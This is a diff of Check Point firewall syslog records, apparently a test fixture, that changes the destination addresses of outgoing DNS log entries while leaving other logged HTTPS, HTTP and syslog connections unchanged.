+<134>1 2020-03-29T18:12:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50f,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505551"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43458"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:12:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50f,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"52.166.113.188"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38166"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50f,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505551"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33949"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:32Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50f,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505551"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45569"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:32Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50f,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505551"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40393"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50f,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505551"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33949"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:32Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50f,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505551"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45569"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:32Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50f,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505551"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40393"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:12:32Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e510,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.95"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50552"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e511,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505553"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47745"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e511,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505553"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48030"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e511,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505553"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47745"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e511,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505553"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48030"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:12:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e512,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"23.100.50.51"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"36980"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:12:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e513,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T18:12:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e513,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50721"; service:"443"; service_id:"https"; src:"192.168.1.117"]
@@ -3698,17 +3698,17 @@
 <134>1 2020-03-29T18:12:36Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e514,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.36"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38880"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10184"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T18:12:36Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e514,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56508"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T18:12:36Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e514,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51264"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10185"; xlatesrc:"0.0.0.0"]
-<134>1 2020-03-29T18:12:37Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e515,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505557"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38271"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:37Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e515,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505557"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42544"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:37Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e515,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505557"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57860"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:37Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e515,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505557"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43769"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:37Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e515,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505557"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38271"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:37Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e515,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505557"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42544"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:37Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e515,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505557"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57860"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:37Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e515,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505557"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43769"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:12:37Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e515,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"151.101.37.108"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38056"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:12:37Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e515,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.54.21"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"47022"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:37Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e515,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505557"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33768"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
